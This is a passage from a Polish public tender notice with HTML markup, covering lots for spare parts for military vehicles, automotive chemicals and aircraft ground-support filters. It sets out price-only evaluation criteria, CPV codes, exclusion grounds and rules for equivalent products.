Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 4 dostawa części zamiennych do pojazdów wojskowych marki JELCZ, IVECO STRALIS, IVECO EUROCARGO- Służba czołgowo-samochodowa<br/><br/><br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych zawartych w Formularzu ofertowym załącznik nr 1 do SWZ w ilościach określonych przez Zamawiającego. <br/>2)	Dostarczony przedmiot zamówienia, powinien być fabrycznie nowy, kategorii I (pierwszej), wolny od wad fizycznych i prawnych odpowiadający swemu przeznaczeniu oraz zgodny z parametrami określonymi przez producentów pojazdów. <br/>3)	Zamawiający wymaga aby przedmiot zamówienia był objęty gwarancją wystawioną przez wykonawcę na okres minimum 12 miesięcy od daty odbioru dostawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 5 dostawa części zamiennych do pojazdów wojskowych marki Star- Służba czołgowo- samochodowa<br/><br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych zawartych w Formularzu ofertowym załącznik nr 1 do SWZ w ilościach określonych przez Zamawiającego. <br/>2)	Dostarczony przedmiot zamówienia, powinien być fabrycznie nowy, kategorii I (pierwszej), wolny od wad fizycznych i prawnych odpowiadający swemu przeznaczeniu oraz zgodny z parametrami określonymi przez producentów pojazdów. <br/>3)	Zamawiający wymaga aby przedmiot zamówienia był objęty gwarancją wystawioną przez wykonawcę na okres minimum 12 miesięcy od daty odbioru dostawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 6 dostawa środków chemicznych do pojazdów wojskowych- Służba czołgowo-samochodowa<br/>1)	Przedmiotem zamówienia jest dostawa środków chemicznych zawartych w Formularzu ofertowym załącznik nr 1 do SWZ w ilościach określonych przez Zamawiającego. <br/>2)	Przedmiot zamówienia powinien być dostarczony fabrycznie nowych opakowaniach producenta, wysokiej jakości odpowiadać swemu przeznaczeniu wraz z kartami charakterystyki substancji, deklaracjami zgodności lub atestami, jeżeli poszczególne artykuły chemii samochodowej takie dokumenty posiadają. <br/>3)	Zamawiający wymaga aby wymieniony towar był z terminem przydatności do użycia minimum 12 miesięcy liczony od daty odbioru dostawy przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39831500-1 - Samochodowe środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 7- Filtry i części zamienne- ZLT<br/><br/>Zakup n/w części zamiennych/filtrów jest niezbędny do zabezpieczenie realizacji obsług bieżących i terminowych oraz do utrzymania sprawności sprzętu Naziemnej Obsługi Statków Powietrznych (NOSP).<br/><br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych/filtrów wskazanych <br/>w specyfikacji w ilościach określonych przez Zamawiającego. <br/>2)	Filtry powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości, odpowiadające swemu przeznaczeniu oraz zgodne z parametrami określonymi przez producentów pojazdów. Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez producenta liczoną od daty odbioru dostawy filtrów do siedziby Wykonawcy. <br/>3)	W związku ze specyfiką rynku filtrów samochodowych (paliwa, oleju, itp.) gdzie funkcjonuje bardzo wielu producentów w/w asortymentu (zamienniki), a każdy <br/>z nich posługuje się swoim oznaczeniem katalogowym w SWZ wskazano nr kat. filtrów wskazanych w dokumentacji technicznej urządzenia. <br/>4)	Wskazanie nr kat. służy jedynie określeniu parametrów technicznych, standardów, właściwości, jakości, funkcji, jakim powinien charakteryzować się przedmiot zamówienia, zastosowanym w celu ułatwienia identyfikacji pożądanego asortymentu przez potencjalnych wykonawców. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42913300-2 - Filtry oleju</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42913000-9 - Filtry wlotu oleju, paliwa i powietrza</p> <p class="mb-0">42913400-3 - Filtry paliwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 8- Filtry i części zamienne- ZLT<br/><br/>Zakup n/w części zamiennych/filtrów jest niezbędny do zabezpieczenie realizacji obsług bieżących i terminowych oraz do utrzymania sprawności sprzętu Naziemnej Obsługi Statków Powietrznych (NOSP).<br/><br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych/filtrów wskazanych <br/>w specyfikacji w ilościach określonych przez Zamawiającego. <br/>2)	Filtry powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości, odpowiadające swemu przeznaczeniu oraz zgodne z parametrami określonymi przez producentów pojazdów. Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez producenta liczoną od daty odbioru dostawy filtrów do siedziby Wykonawcy. <br/>3)	W związku ze specyfiką rynku filtrów samochodowych (paliwa, oleju, itp.) gdzie funkcjonuje bardzo wielu producentów w/w asortymentu (zamienniki), a każdy <br/>z nich posługuje się swoim oznaczeniem katalogowym w SWZ wskazano nr kat. filtrów wskazanych w dokumentacji technicznej urządzenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42913300-2 - Filtry oleju</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42913000-9 - Filtry wlotu oleju, paliwa i powietrza</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 9- Filtry i części zamienne- ZLT<br/><br/><br/>Zakup n/w części zamiennych/filtrów jest niezbędny do zabezpieczenie realizacji obsług bieżących i terminowych oraz do utrzymania sprawności sprzętu Naziemnej Obsługi Statków Powietrznych (NOSP).<br/><br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych/filtrów wskazanych <br/>w specyfikacji w ilościach określonych przez Zamawiającego. <br/>2)	Filtry powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości, odpowiadające swemu przeznaczeniu oraz zgodne z parametrami określonymi przez producentów pojazdów. Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez producenta liczoną od daty odbioru dostawy filtrów do siedziby Wykonawcy. <br/>3)	W związku ze specyfiką rynku filtrów samochodowych (paliwa, oleju, itp.) gdzie funkcjonuje bardzo wielu producentów w/w asortymentu (zamienniki), a każdy <br/>z nich posługuje się swoim oznaczeniem katalogowym w SWZ wskazano nr kat. filtrów wskazanych w dokumentacji technicznej urządzenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42913300-2 - Filtry oleju</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42913000-9 - Filtry wlotu oleju, paliwa i powietrza</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.1.	W zakresie potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania zamawiający zażąda: <br/>2.2.1.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp; <br/><br/>Zgodnie z treścią art. 274 ust. 4 ustawy Pzp Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. W związku z powyższym, jeżeli Wykonawca oraz każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia – konsorcja/spółki cywilne – wskaże w oświadczeniu załącznik Nr 2/2a do SWZ bazy, z których Zamawiający bezpłatnie może pozyskać określone dokumenty potwierdzające sytuację podmiotową Wykonawcy – to Zamawiający nie będzie wzywał Wykonawcy do ich złożenia. <br/><br/>2.2.2.	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. 2022 poz. 1689, 1705), z innym Wykonawcą, który złożył odrębną ofertę/ ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp Wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>2.2.3.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 3 ustawy, <br/>c)	art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>d)	art. 108 ust. 1 pkt 5 ustawy Pzp odnośnie do zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>e)	art. 108 ust. 1 pkt 6 ustawy Pzp, <br/>f)	art. 7 ust. 1 ustawy z dnia 13 kwietnia o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/><br/>Wzór oświadczenia stanowi załącznik nr 7/7a do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dotyczy zadań 1, 2, 3, 4, 5, 7, 8, 9:<br/><br/>Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych, potwierdzających, że oferowane przez Wykonawcę produkty spełniają wymagania określone przez Zamawiającego .<br/><br/>Wykonawca, który powołuje się na rozwiązania równoważne opisane przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy przedmiotu zamówienia spełniają wymagania określone przez Zamawiającego przedkładając do oferty:<br/>a)	Opis produktu równoważnego w postaci np.: szczegółowej karty produktu, deklaracji zgodności, certyfikatu lub świadectwa producenta, certyfikatu wydanego przez Jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę potwierdzającego zgodności danego produktu z podanymi w Formularzu ofertowym stanowiącym Załącznik nr 1 do SWZ.<br/><br/>W celu potwierdzenia zgodności oferowanego przedmiotu zamówienia w zakresie oferowanego przez Wykonawcę ze wskazanymi przez zamawiającego w opisie przedmiotu zamówienia, Wykonawca załączy do oferty przedmiotowe środki dowodowe. Z treści przedmiotowych środków dowodowych musi wynikać, że oferowany przedmiot zamówienia jest zgodny z wymaganiami określonymi przez zamawiającego w dokumentach zamówienia (Szczegółowym opisie przedmiotu zamówienia oraz Formularzu ofertowym).<br/><br/><br/>Numery katalogowe wyrobów podane w SWZ (w formularzu ofertowym –załącznika nr 1 do SWZ) zostały zamieszczone dla Wykonawców w celu precyzyjnego określenia żądanego asortymentu. Zamawiający dopuszcza wyroby o podanych numerach katalogowych lub wyroby inne, ale muszą być one równoważne jakościowo, funkcjonalnie i użytkowo do określonych w SWZ. Oznacza to, że w ofercie nie może być zaoferowany asortyment o niższym standardzie i gorszych parametrach niż określono w SWZ.<br/><br/>Zamawiający dopuszcza złożenie ofert równoważnych w przedmiocie zamówienia. Przez ofertę równoważną Zamawiający rozumie części o parametrach i standardach jakościowych takich samych bądź lepszych w stosunku do wskazanych pożądanych) przez Zamawiającego .<br/><br/>UWAGA!!!!<br/>W celu umożliwienia identyfikacji przedmiotu zamówienia Zamawiający wymaga wypełnienia kolumny Nr 11 w załączniku nr 1 do SWZ Formularz ofertowy oraz złożenia przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanego przedmiotu zamówienia w zakresie parametrów sprzętu oferowanego przez Wykonawcę z parametrami wskazanymi przez zamawiającego w opisie przedmiotu zamówienia- dotyczy zadań w których Zamawiający nie wskazał kolumnie 4 pomocniczo informacyjnie – numeru katalogowego<br/><br/><br/>UWAGA!!!!<br/>Jeżeli Wykonawca nie wypełnia wymaganej kolumny nr 11 oznaczać to będzie, że Wykonawca dostarczy towar opisany przez Zamawiającego w kolumnie nr 4 Formularza ofertowego- dotyczy tylko zadań w których Zamawiający wskazał w kolumnie 4 pomocniczo informacyjnie – numer katalogowy.<br/><br/>UWAGA! Dla pozycji, w których Wykonawca oferuje wskazany przez Zamawiającego numer katalogowy – nie ma obowiązku dostarczania przedmiotowych środków dowodowych.<br/><br/>Wykonawca, który powołuje się na rozwiązania równoważne( inne aniżeli wskazane przez Zamawiającego w kolumnie 4 tabeli Formularza ofertowego pomocniczo informacyjnie – numer katalogowy jest obowiązany wykazać, że oferowane przez niego dostawy przedmiotu zamówienia spełniają wymagania określone przez Zamawiającego przedkładając do oferty:<br/>a)	Opis produktu równoważnego w postaci np.: szczegółowej karty produktu, deklaracji zgodności, certyfikatu lub świadectwa producenta, certyfikatu wydanego przez Jednostkę oceniającą zgodność 